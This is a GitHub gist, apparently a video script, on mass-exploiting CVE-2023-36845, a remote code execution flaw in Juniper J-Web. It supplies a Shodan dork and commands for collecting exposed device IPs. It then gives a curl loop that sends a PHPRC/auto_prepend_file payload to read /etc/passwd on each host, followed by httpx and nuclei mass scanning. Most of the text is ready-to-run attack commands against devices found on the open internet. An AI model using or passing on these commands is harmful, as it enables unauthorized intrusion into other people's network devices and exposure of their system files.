Created
October 1, 2023 03:38
-
-
Save simrotion13/b5352e3337032512681aa03e7c27c0dc to your computer and use it in GitHub Desktop.
CVE-2023-36845
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hi Guys.. | |
| In this video, we will see mass exploitation of Juniper Web Device Manager - RCE vulnerability (CVE-2023-36845). | |
| Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands | |
| Shodan Dork : title:"Juniper" http.favicon.hash:2141724739 | |
| Download the results using below command ( Shodan Premium API Key is needed ) | |
| shodan download --limit -1 juniper 'title:"Juniper" http.favicon.hash:2141724739' | |
| I already downloaded the results using shodan cli command | |
| We will seperate the IP from shodan results. For this we will use shodan parse command along with awk | |
| shodan parse juniper.json.gz --fields ip_str,port --separator " " | awk '{print $1}' | tee -a ip.txt | |
| We will using below process to automate the findings | |
| cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo $host "is VULN";done | |
| We can also use nuclei to do the mass scanning. let try first nuclei as its faster that above one liner | |
| cat ip.txt | httpx -silent | tee url.txt | |
| cat url.txt | nuclei -t rce.yaml | tee output.txt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
CVE-2023-36845